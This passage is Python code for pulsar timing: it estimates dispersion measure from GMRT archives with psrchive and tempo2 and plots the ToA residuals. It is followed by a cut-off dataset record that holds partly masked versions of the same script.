ax1 = plt.subplot2grid((3, 8), (2,0), rowspan=1, colspan=3)
ax2 = plt.subplot2grid((3, 8), (0,4), colspan=4)
ax3 = plt.subplot2grid((3, 8), (1,4), colspan=4)
ax4 = plt.subplot2grid((3, 8), (2,4), colspan=4)
ax0.imshow((np.sqrt(profdata2D**2))**0.5, origin='lower', extent=(0,ar_nbin-1,freq_bot,freq_top), aspect='auto', cmap='hot')
ax0.set_ylabel('Frequency (MHz)', fontweight='bold', fontsize=12)
ax0.tick_params(axis='x', which='both', bottom=True, top=True,
labelbottom=False)
ax1.plot(np.arange(ar_nbin, dtype=float),profdata1D, color='black', linewidth=0.5)
ax1.set_xlim(0,ar_nbin-1)
ax1.set_xlabel('Pulse Phase (bins)', fontweight='bold', fontsize=12)
ax1.set_ylabel('Intensity', fontweight='bold', fontsize=12)
ax2.errorbar(freqtmp, toastmp, yerr=Terrtmp,fmt='.', color='gray', label='Prefit: Unfiltered', capsize=2)
ax2.plot(freqtmp, y_pred,'--r', label='Polynomial Fit')
ax2.set_xlim(freq_bot, freq_top)
ax2.grid()
ax2.legend(loc='upper right')
ax2.axes.xaxis.set_ticklabels([])
ax3.yaxis.set_label_position("right")
ax3.errorbar(freqf, toasf-np.median(toasf), terrf,fmt='.k', label='Prefit: Filtered', capsize=2)
ax3.set_xlim(freq_bot, freq_top)
ax3.grid()
ax3.legend(loc='upper right')
ax3.axes.xaxis.set_ticklabels([])
ax3.set_ylabel(r'ToA Residuals ($\mu$s)', fontweight='bold', fontsize=12)
ax4.errorbar(freqf1, toasf1-np.median(toasf1), terrf1, fmt='.r', label='Postfit', capsize=2)
ax4.set_xlim(freq_bot, freq_top)
ax4.grid()
ax4.legend(loc='upper right')
ax4.set_xlabel('Frequency (MHz)', fontweight='bold', fontsize=12)
fig.suptitle('Source: PSR %s; MJD: %.4f; Prefit Wrms: %.2f $\mu$s; Postfit Wrms: %.2f $\mu$s\nMedian ToA Err: %.2f $\mu$s; DM: %.6f $\pm$ %.6f pc cm$^{-3}$; Reduced $\chi^2$: %.2f' % (ar.get_source(), ar_mjd, prefit_rms, postfit_rms, np.median(terrf1), dmval, dmverr, fitchisq), fontsize=11, fontweight='bold')
dirplot=os.path.join(pwd,ar_psr+"_"+ar_tel+"_plots")
if not os.path.exists(dirplot):
os.makedirs(dirplot)
plotfile=dirplot+"/"+ar_psr+"_"+str(ar_mjd)+"_"+str(ar_centfr)+"_"+ar_tel+"_DMfitResid.pdf"
plt.savefig(plotfile, format='pdf')
plt.close()
if not quiet:
print ('done!')
del ar
return(dmval, dmverr, fitchisq, prefit_rms, postfit_rms, np.median(terrf1))
''' Frequency appending the data archives '''
def freq_appendData(narch, archives, offset, b3scrunch, b5scrunch):
for i in range(narch):
archives[i].tscrunch()
	# GMRT-specific jump. This is not ideal, as the jumps calculated by tempo2
	# depend on the pulsar period. The default value of this jump comes from
	# the timing of PSR J1643-1224.
	# PS: this jump is valid only for the cycle 37 dataset (or the given MJD limits).
if (archives[0].get_telescope() == 'GMRT'):
for i in range(narch):
ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()
ar_frq = archives[i].get_centre_frequency()
ar_bw = archives[i].get_bandwidth()
period = (archives[i].get_Integration(0).get_folding_period())
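			# fixed band-5 time offset (seconds) for this observing cycle (note:
			# this overrides the command-line value); converted below to a
			# fractional pulse phase and applied as a rotation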
offset = 0.670520675
jump = (offset/period) - int(offset/period)
if (ar_frq >= 1260. and ar_frq < 1460.):
if (ar_mjd >=58810. and ar_mjd < 58991.):
archives[i].rotate_phase(-jump)
freq_append = psrchive.FrequencyAppend()
ttfreq = archives[0].get_centre_frequency()
if (300. < ttfreq < 500.):
archives[0].fscrunch(b3scrunch)
if (1160. < ttfreq < 1460.):
archives[0].fscrunch(b5scrunch)
freq_append.init(archives[0])
while len(archives) > 1:
ttfreq = archives[1].get_centre_frequency()
if (300. < ttfreq < 500.):
archives[1].fscrunch(b3scrunch)
if (1160. < ttfreq < 1460.):
archives[1].fscrunch(b5scrunch)
freq_append.append(archives[0],archives[1])
del archives[1]
return(archives[0])
''' Frequency Appending the Templates '''
def freq_appendModel(narch, archives, offset, b3scrunch, b5scrunch):
for i in range(narch):
archives[i].tscrunch()
	# GMRT-specific jump. This is not ideal, as the jumps calculated by tempo2
	# depend on the pulsar period. The default value of this jump comes from
	# the timing of PSR J1643-1224.
	# PS: this jump is valid only for the cycle 37 dataset (or the given MJD limits).
if (archives[0].get_telescope() == 'GMRT'):
for i in range(narch):
ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()
ar_frq = archives[i].get_centre_frequency()
ar_bw = archives[i].get_bandwidth()
period = (archives[i].get_Integration(0).get_folding_period())
offset = 0.670520675
jump = (offset/period) - int(offset/period)
if (ar_frq >= 1260. and ar_frq < 1460.):
if (ar_mjd >=58810. and ar_mjd < 58991.):
archives[i].rotate_phase(-jump)
freq_append = psrchive.FrequencyAppend()
ttfreq = archives[0].get_centre_frequency()
if (300. < ttfreq < 500.):
archives[0].fscrunch(b3scrunch)
if (1160. < ttfreq < 1460.):
archives[0].fscrunch(b5scrunch)
freq_append.init(archives[0])
while len(archives) > 1:
ttfreq = archives[1].get_centre_frequency()
if (300. < ttfreq < 500.):
archives[1].fscrunch(b3scrunch)
if (1160. < ttfreq < 1460.):
archives[1].fscrunch(b5scrunch)
freq_append.append(archives[0],archives[1])
del archives[1]
return(archives[0])
#----------------------------------------------------------------------------------#
main()
|
normal
|
{
"blob_id": "e464b465c4bc90c250c0ea02c17b7398d975964b",
"index": 1163,
"step-1": "<mask token>\n\n\ndef main():\n args = parser.parse_args()\n quiet = False\n if args.quiet:\n quiet = True\n tempo2 = True\n ptoa = False\n if args.print_toas:\n ptoa = True\n if not quiet:\n print('Loading the archive files for DM estimation')\n archives = []\n for filename in args.files:\n archives.append(psrchive.Archive_load(filename))\n narch = len(archives)\n if narch >= 1:\n if not quiet:\n print('Appending the archives ...'),\n ar = freq_appendData(narch, archives, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if not quiet:\n print(' done!')\n elif not quiet:\n print('Only one archive was given, so nothing to frequency-append.')\n ar = archives[0]\n del archives\n ar_psr = ar.get_source()\n ar_nbins = ar.get_nbin()\n ar_tel = ar.get_telescope()\n mjd_start = ar.get_Integration(0).get_start_time().in_days()\n mjd_end = ar.get_Integration(0).get_end_time().in_days()\n ar_mjd = mjd_start + (mjd_end - mjd_start) / 2.0\n length = ar.integration_length()\n ar.update_centre_frequency()\n ar_centfr = ar.get_centre_frequency()\n ar_nchan = ar.get_nchan()\n ar_bw = ar.get_bandwidth()\n ar_chnwdth = ar_bw / ar_nchan\n ffrac = args.fscrunch\n if not quiet:\n print('\\nNow preparing for DM estimation\\n')\n pwd = os.getcwd()\n if args.ephem != None:\n ephemeris = args.ephem\n else:\n ephemeris = 'ephemerides/' + ar_psr + '.par'\n if not os.path.exists(ephemeris):\n sys.exit(1)\n if not quiet:\n print('\\nEphemeris file is:' + ephemeris + '\\n')\n model = []\n for filename in args.model:\n model.append(psrchive.Archive_load(filename))\n if args.model != None:\n if len(args.model) == 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if len(args.model) > 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if args.model == None:\n if not quiet:\n print('Looking for matching template in templates directory...'),\n import subprocess\n tempdir = 'templates/*.sm'\n tempfile = ar_psr + '_tmp.txt'\n a = subprocess.call(\n \"psredit -c name,nbin,bw,nchan,freq -Q '%s' > '%s'\" % (tempdir,\n tempfile), shell=True)\n tempnchan = ''\n t1 = str(ar_nbins)\n if ar_tel == 'gmrt':\n t2 = str(int(ar_bw))\n else:\n t2 = str(ar_bw)\n t3 = '%.2f' % ar_centfr\n f = open(tempfile, 'r')\n for line in f:\n line = line.strip()\n columns = line.split()\n t4 = float(columns[5])\n t4 = '%.2f' % t4\n if ar_tel == 'gmrt':\n if columns[1] == ar_psr and columns[2] == t1 and str(int(\n columns[3])) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n elif columns[1] == ar_psr and columns[2] == t1 and str(columns[3]\n ) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n if modeltempl == '' and tempnchan == '':\n print(\n '\\n** No matching template found for DM fitting. Exiting. 
**\\n'\n )\n sys.exit(1)\n f.close()\n os.remove(tempfile)\n if not quiet:\n print('Found matching template: ' + modeltempl)\n model.append(psrchive.Archive_load(modeltempl))\n if not quiet:\n print('\\nEstimating the DM from the observation')\n model.update_centre_frequency()\n arch = ar.clone()\n dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err = DMCalc(arch,\n ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch)\n if args.writeout:\n infile = open(ephemeris, 'r')\n tmpeph = ar_psr + '.eph'\n output = open(tmpeph, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 'DM\\t\\t\\t ' + str(dmval) + '\\t\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t\\t ' + str(round(ar_mjd, 2))\n if not args.quiet:\n print('Updating the ephemeris with new DM... '),\n f = open(tmpeph, 'a')\n f.write('%s\\n %s\\n' % (dmline, dmepochline))\n if not args.quiet:\n print(' done!')\n f.close()\n if not quiet:\n print(\n 'Correcting the DM of the observed file and writing it out... '\n ),\n os.remove(tmpeph)\n dirfinal = os.path.join(pwd, ar_psr + '_' + ar_tel + '_final')\n if not os.path.exists(dirfinal):\n os.makedirs(dirfinal)\n outfile = dirfinal + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '.ar'\n ar.set_dispersion_measure(dmval)\n ar.dedisperse()\n if not args.Tscrunch:\n ar.tscrunch(args.tscrunch)\n else:\n ar.tscrunch()\n if not args.Fscrunch:\n ar.fscrunch(ffrac)\n else:\n ar.fscrunch()\n ar.unload(outfile)\n if not args.quiet:\n print(' done!')\n del ar\n if not quiet:\n print('The file is corrected for DM and is written out to\\n' +\n outfile)\n f = open(ar_psr + '_DM_timeseries.txt', 'a')\n f.write('%s %.4f %.6f %.6f %.2f %.4f %.4f %.4f %.2f %.2f %s\\n' % (\n filename, ar_mjd, dmval, dmverr, fitchisq, pre_rms, post_rms,\n ToA_Err, ar_centfr, ar_bw, ar_tel))\n f.close()\n import time\n end = time.time()\n total = end - start\n print(\n '-----------------------------------------------------------------------------'\n )\n print('MJD\\t\\tDM\\t\\tDMerr\\t\\tChisq\\tC_Fr\\tBW\\tTel')\n print('%.6f\\t%.6f\\t%.6f\\t%.2f\\t%.1f\\t%.1f\\t%s' % (ar_mjd, dmval, dmverr,\n fitchisq, ar_centfr, ar_bw, ar_tel))\n print(\n '-----------------------------------------------------------------------------'\n )\n print('\\nThe program took %.1f seconds to finish' % total)\n\n\n<mask token>\n\n\ndef DMCalc(ar, ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch):\n if model == None:\n sys.exit(1)\n init_dm = ar.get_dispersion_measure()\n if not quiet:\n print('Using the ArrivalTime (pat) with PGS in Tempo2 format')\n arrtim = psrchive.ArrivalTime()\n arrtim.set_shift_estimator('PGS')\n arrtim.set_format('Tempo2')\n arrtim.set_format_flags('IPTA')\n if not quiet:\n print('Loading the template file for processing... '),\n std = model.clone()\n std.pscrunch()\n std.tscrunch()\n std_nchan = std.get_nchan()\n std.dedisperse()\n std.fscrunch(ffrac)\n arrtim.set_standard(std)\n if not quiet:\n print(' done!')\n ar.fscrunch(ffrac)\n ar.pscrunch()\n ar.tscrunch()\n arrtim.set_observation(ar)\n if not quiet:\n print('Finding the ToAs... 
'),\n toas = arrtim.get_toas()\n toas_filtered = [x.split()[:5] for x in toas]\n str_filename, str_freq, str_mjd, str_toaErr, str_site = zip(*toas_filtered)\n freq = np.asarray(str_freq, dtype=np.float64)\n amjd = np.asarray(str_mjd, dtype=np.float64)\n terr = np.asarray(str_toaErr, dtype=np.float64)\n if not quiet:\n print(' done!')\n print('Removing the bad ToAs using Huber Regression... '),\n condition1 = terr < 3 * np.median(terr)\n freqnew = np.extract(condition1, freq)\n amjdnew = np.extract(condition1, amjd)\n terrnew = np.extract(condition1, terr)\n tempfile = ar_psr + '_tmp.txt'\n f = open(tempfile, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename[0], freqnew[i],\n amjdnew[i], terrnew[i], str_site[0]))\n f.close()\n tmpstr = 'tempo2 -output general2 -f'\n tmp = os.popen(tmpstr + \n ' %s %s -s \"1111111 {freq} {pre} {err}\\n\" | grep \\'1111111\\'' % (\n ephemeris, tempfile)).read()\n os.remove(tempfile)\n tmp1 = tmp.split('\\n')\n freqtmp = np.zeros(np.size(amjdnew))\n toastmp = np.zeros(np.size(amjdnew))\n TErrtmp = np.zeros(np.size(amjdnew))\n for i in range(np.size(amjdnew)):\n _, freqtmp[i], toastmp[i], TErrtmp[i] = tmp1[i].split()\n TErrtmp /= 1000000.0\n from sklearn import linear_model\n from sklearn.linear_model import HuberRegressor\n from sklearn.preprocessing import PolynomialFeatures\n from sklearn.pipeline import make_pipeline\n freqarr = freqtmp.reshape(-1, 1)\n toastmp *= 1000000.0\n toashift = np.min(toastmp) * -1.5\n toastmp += toashift\n Terrtmp = TErrtmp * 1000000.0\n model = make_pipeline(PolynomialFeatures(2), HuberRegressor())\n model.fit(freqarr, toastmp, huberregressor__sample_weight=np.ravel(1.0 /\n Terrtmp))\n y_pred = model.predict(freqarr)\n residuals = toastmp - y_pred\n median = np.median(residuals)\n MAD = np.median(np.abs(residuals - np.median(residuals))\n ) / 0.6744897501960817\n condition2 = (residuals > median - 3 * MAD) & (residuals < median + 3 * MAD\n )\n freqf = np.around(np.extract(condition2, freqarr), 3)\n amjdf = np.extract(condition2, amjdnew)\n toasf = np.extract(condition2, toastmp)\n terrf = np.extract(condition2, TErrtmp)\n prefit_rms = np.sqrt(np.cov(toasf, aweights=terrf))\n terrf *= 1000000.0\n if not quiet:\n print(' done!')\n if ptoa:\n if not quiet:\n print('Writing out ToAs into a file in tempo2 format'),\n dirtoas = os.path.join(pwd, ar_psr + '_' + ar_tel + '_ToAs')\n if not os.path.exists(dirtoas):\n os.makedirs(dirtoas)\n outfile = dirtoas + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '_ToAs.txt'\n f = open(outfile, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print('done!')\n if not quiet:\n print('\\nWriting the ToAs to a temporary file for tempo2 fitting...'),\n outfiletmp = ar_psr + 'tmp_ToAs.txt'\n f = open(outfiletmp, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print(' done!\\n')\n dmstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'DM (cm^-3 pc)'| awk '{print $5,$6}'\"\n % (ephemeris, outfiletmp)).read()\n dm, dmerr = dmstr.split()\n dmval = float(dm)\n dmverr = float(dmerr)\n chisqstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'Fit Chisq'| awk 
'{print $9}'\" %\n (ephemeris, outfiletmp)).read()\n fitchisq = float(chisqstr)\n os.remove(outfiletmp)\n infile = open(ephemeris, 'r')\n tmpeph1 = ar_psr + '_tmpeph.eph'\n output = open(tmpeph1, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 'DM ' + str(dmval) + '\\t1\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t ' + str(round(ar_mjd, 2))\n f = open(tmpeph1, 'a')\n f.write('%s\\n%s\\n' % (dmline, dmepochline))\n f.close()\n newarch = ar.clone()\n newarch.tscrunch()\n newarch.set_dispersion_measure(dmval)\n arrtim.set_observation(newarch)\n arrtim.set_standard(std)\n toas1 = arrtim.get_toas()\n toas1_filtered = [x.split()[:5] for x in toas1]\n str_filename1, str_freq1, str_mjd1, str_toaErr1, str_site1 = zip(*\n toas1_filtered)\n freq1 = np.asarray(str_freq1, dtype=np.float64)\n amjd1 = np.asarray(str_mjd1, dtype=np.float64)\n terr1 = np.asarray(str_toaErr1, dtype=np.float64)\n freqnew1 = np.extract(condition1, freq1)\n amjdnew1 = np.extract(condition1, amjd1)\n terrnew1 = np.extract(condition1, terr1)\n tempfile1 = ar_psr + '_tmp1.txt'\n f = open(tempfile1, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew1)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename1[0], freqnew1[i],\n amjdnew1[i], terrnew1[i], str_site1[0]))\n f.close()\n tmp2 = os.popen(\n \"\"\"tempo2 -output general2 -f %s %s -s \"1111111 {freq} {pre} {err}\n\" | grep '1111111'\"\"\"\n % (tmpeph1, tempfile1)).read()\n os.remove(tempfile1)\n os.remove(tmpeph1)\n tmp3 = tmp2.split('\\n')\n freqtmp2 = np.zeros(np.size(amjdnew1))\n toastmp2 = np.zeros(np.size(amjdnew1))\n TErrtmp2 = np.zeros(np.size(amjdnew1))\n for i in range(np.size(amjdnew1)):\n _, freqtmp2[i], toastmp2[i], TErrtmp2[i] = tmp3[i].split()\n freqf1 = np.around(np.extract(condition2, freqtmp2), 3)\n amjdf1 = np.extract(condition2, amjdnew1)\n toasf1 = np.extract(condition2, toastmp2)\n terrf1 = np.extract(condition2, TErrtmp2)\n toasf1 *= 1000000.0\n postfit_rms = np.sqrt(np.cov(toasf1, aweights=terrf1))\n ar_nbin = newarch.get_nbin()\n ar_nchn = newarch.get_nchan()\n if narch == 1:\n freq_bot = ar.get_centre_frequency() - ar_bw / 2.0\n freq_top = ar.get_centre_frequency() + ar_bw / 2.0\n if narch > 1:\n if ar_bw == 200.0:\n freq_bot = 400.0\n freq_top = 1460.0\n if ar_bw == 400.0:\n freq_bot = 300.0\n freq_top = 1460.0\n newarch.dedisperse()\n newarch.remove_baseline()\n profdata2D = newarch.get_data()[:, 0, :, :].flatten().reshape(ar_nchn,\n ar_nbin)\n prof = newarch.clone()\n prof.fscrunch()\n profdata1D = prof.get_data().flatten()\n profdata1D /= np.max(profdata1D)\n residDM = init_dm - dmval\n dmcurve = 4.15 * 1000.0 * residDM * (1.0 / (np.min(freqf) / 1000.0) ** \n 2 - 1.0 / (freqf / 1000.0) ** 2)\n dmoff = np.median(toasf) - np.median(dmcurve)\n dmcurve += dmoff\n fig = plt.figure(3, figsize=(8, 6))\n fig.subplots_adjust(hspace=0.05)\n ax0 = plt.subplot2grid((3, 8), (0, 0), rowspan=2, colspan=3)\n ax1 = plt.subplot2grid((3, 8), (2, 0), rowspan=1, colspan=3)\n ax2 = plt.subplot2grid((3, 8), (0, 4), colspan=4)\n ax3 = plt.subplot2grid((3, 8), (1, 4), colspan=4)\n ax4 = plt.subplot2grid((3, 8), (2, 4), colspan=4)\n ax0.imshow(np.sqrt(profdata2D ** 2) ** 0.5, origin='lower', extent=(0, \n ar_nbin - 1, freq_bot, freq_top), aspect='auto', cmap='hot')\n ax0.set_ylabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n ax0.tick_params(axis='x', which='both', bottom=True, 
top=True,\n labelbottom=False)\n ax1.plot(np.arange(ar_nbin, dtype=float), profdata1D, color='black',\n linewidth=0.5)\n ax1.set_xlim(0, ar_nbin - 1)\n ax1.set_xlabel('Pulse Phase (bins)', fontweight='bold', fontsize=12)\n ax1.set_ylabel('Intensity', fontweight='bold', fontsize=12)\n ax2.errorbar(freqtmp, toastmp, yerr=Terrtmp, fmt='.', color='gray',\n label='Prefit: Unfiltered', capsize=2)\n ax2.plot(freqtmp, y_pred, '--r', label='Polynomial Fit')\n ax2.set_xlim(freq_bot, freq_top)\n ax2.grid()\n ax2.legend(loc='upper right')\n ax2.axes.xaxis.set_ticklabels([])\n ax3.yaxis.set_label_position('right')\n ax3.errorbar(freqf, toasf - np.median(toasf), terrf, fmt='.k', label=\n 'Prefit: Filtered', capsize=2)\n ax3.set_xlim(freq_bot, freq_top)\n ax3.grid()\n ax3.legend(loc='upper right')\n ax3.axes.xaxis.set_ticklabels([])\n ax3.set_ylabel('ToA Residuals ($\\\\mu$s)', fontweight='bold', fontsize=12)\n ax4.errorbar(freqf1, toasf1 - np.median(toasf1), terrf1, fmt='.r',\n label='Postfit', capsize=2)\n ax4.set_xlim(freq_bot, freq_top)\n ax4.grid()\n ax4.legend(loc='upper right')\n ax4.set_xlabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n fig.suptitle(\n \"\"\"Source: PSR %s; MJD: %.4f; Prefit Wrms: %.2f $\\\\mu$s; Postfit Wrms: %.2f $\\\\mu$s\nMedian ToA Err: %.2f $\\\\mu$s; DM: %.6f $\\\\pm$ %.6f pc cm$^{-3}$; Reduced $\\\\chi^2$: %.2f\"\"\"\n % (ar.get_source(), ar_mjd, prefit_rms, postfit_rms, np.median(\n terrf1), dmval, dmverr, fitchisq), fontsize=11, fontweight='bold')\n dirplot = os.path.join(pwd, ar_psr + '_' + ar_tel + '_plots')\n if not os.path.exists(dirplot):\n os.makedirs(dirplot)\n plotfile = dirplot + '/' + ar_psr + '_' + str(ar_mjd) + '_' + str(ar_centfr\n ) + '_' + ar_tel + '_DMfitResid.pdf'\n plt.savefig(plotfile, format='pdf')\n plt.close()\n if not quiet:\n print('done!')\n del ar\n return dmval, dmverr, fitchisq, prefit_rms, postfit_rms, np.median(terrf1)\n\n\n<mask token>\n\n\ndef freq_appendData(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\n<mask token>\n\n\ndef freq_appendModel(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / 
period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\n<mask token>\n",
"step-2": "<mask token>\nmatplotlib.use('Agg')\n<mask token>\nparser.add_argument('files', nargs='+', type=str, help=\n 'The list of fits file(s) for processing')\nparser.add_argument('-E', '--ephem', type=str, help=\n 'Ephemeris file to update the model. Exits if not ' +\n 'given or is not available in \"PWD/ephemerides\" ' + 'directory')\nparser.add_argument('-M', '--model', nargs='+', type=str, help=\n 'Model template for ToA generation. Exits if not ' +\n 'given or is not available in \"PWD/templates\" ' + 'directory')\nparser.add_argument('-f', '--fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'doing DM estimation (Def: 1)')\nparser.add_argument('-b3f', '--b3fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'band3 GMRT data (Def: 1)')\nparser.add_argument('-b5f', '--b5fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'band5 GMRT data (Def: 1)')\nparser.add_argument('-w', '--writeout', action='store_true', help=\n 'Writes out the DM corrected file. Def: False')\nparser.add_argument('-ptoa', '--print_toas', action='store_true', help=\n 'Print the prefit ToAs to file in tempo2 format. ' + 'Def: False')\nparser.add_argument('-F', '--Fscrunch', action='store_true', help=\n 'Fully scrunch the number of channels for the ' +\n 'final output archive (Def: False)')\nparser.add_argument('-T', '--Tscrunch', action='store_true', help=\n 'Completely time scrunch all the integrations')\nparser.add_argument('-t', '--tscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of integrations for ' +\n 'the final output archive (Def: None)')\nparser.add_argument('-o', '--offset', type=float, default=0.670520675, help\n ='Offset to shift band 5 ToAs (in secs)')\nparser.add_argument('-q', '--quiet', action='store_true', help=\n 'Only print warnings')\n\n\ndef main():\n args = parser.parse_args()\n quiet = False\n if args.quiet:\n quiet = True\n tempo2 = True\n ptoa = False\n if args.print_toas:\n ptoa = True\n if not quiet:\n print('Loading the archive files for DM estimation')\n archives = []\n for filename in args.files:\n archives.append(psrchive.Archive_load(filename))\n narch = len(archives)\n if narch >= 1:\n if not quiet:\n print('Appending the archives ...'),\n ar = freq_appendData(narch, archives, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if not quiet:\n print(' done!')\n elif not quiet:\n print('Only one archive was given, so nothing to frequency-append.')\n ar = archives[0]\n del archives\n ar_psr = ar.get_source()\n ar_nbins = ar.get_nbin()\n ar_tel = ar.get_telescope()\n mjd_start = ar.get_Integration(0).get_start_time().in_days()\n mjd_end = ar.get_Integration(0).get_end_time().in_days()\n ar_mjd = mjd_start + (mjd_end - mjd_start) / 2.0\n length = ar.integration_length()\n ar.update_centre_frequency()\n ar_centfr = ar.get_centre_frequency()\n ar_nchan = ar.get_nchan()\n ar_bw = ar.get_bandwidth()\n ar_chnwdth = ar_bw / ar_nchan\n ffrac = args.fscrunch\n if not quiet:\n print('\\nNow preparing for DM estimation\\n')\n pwd = os.getcwd()\n if args.ephem != None:\n ephemeris = args.ephem\n else:\n ephemeris = 'ephemerides/' + ar_psr + '.par'\n if not os.path.exists(ephemeris):\n sys.exit(1)\n if not quiet:\n print('\\nEphemeris file is:' + ephemeris + '\\n')\n model = []\n for filename in args.model:\n model.append(psrchive.Archive_load(filename))\n if args.model != None:\n if len(args.model) == 1:\n model = freq_appendModel(1, model, args.offset, 
args.b3fscrunch,\n args.b5fscrunch)\n if len(args.model) > 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if args.model == None:\n if not quiet:\n print('Looking for matching template in templates directory...'),\n import subprocess\n tempdir = 'templates/*.sm'\n tempfile = ar_psr + '_tmp.txt'\n a = subprocess.call(\n \"psredit -c name,nbin,bw,nchan,freq -Q '%s' > '%s'\" % (tempdir,\n tempfile), shell=True)\n tempnchan = ''\n t1 = str(ar_nbins)\n if ar_tel == 'gmrt':\n t2 = str(int(ar_bw))\n else:\n t2 = str(ar_bw)\n t3 = '%.2f' % ar_centfr\n f = open(tempfile, 'r')\n for line in f:\n line = line.strip()\n columns = line.split()\n t4 = float(columns[5])\n t4 = '%.2f' % t4\n if ar_tel == 'gmrt':\n if columns[1] == ar_psr and columns[2] == t1 and str(int(\n columns[3])) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n elif columns[1] == ar_psr and columns[2] == t1 and str(columns[3]\n ) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n if modeltempl == '' and tempnchan == '':\n print(\n '\\n** No matching template found for DM fitting. Exiting. **\\n'\n )\n sys.exit(1)\n f.close()\n os.remove(tempfile)\n if not quiet:\n print('Found matching template: ' + modeltempl)\n model.append(psrchive.Archive_load(modeltempl))\n if not quiet:\n print('\\nEstimating the DM from the observation')\n model.update_centre_frequency()\n arch = ar.clone()\n dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err = DMCalc(arch,\n ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch)\n if 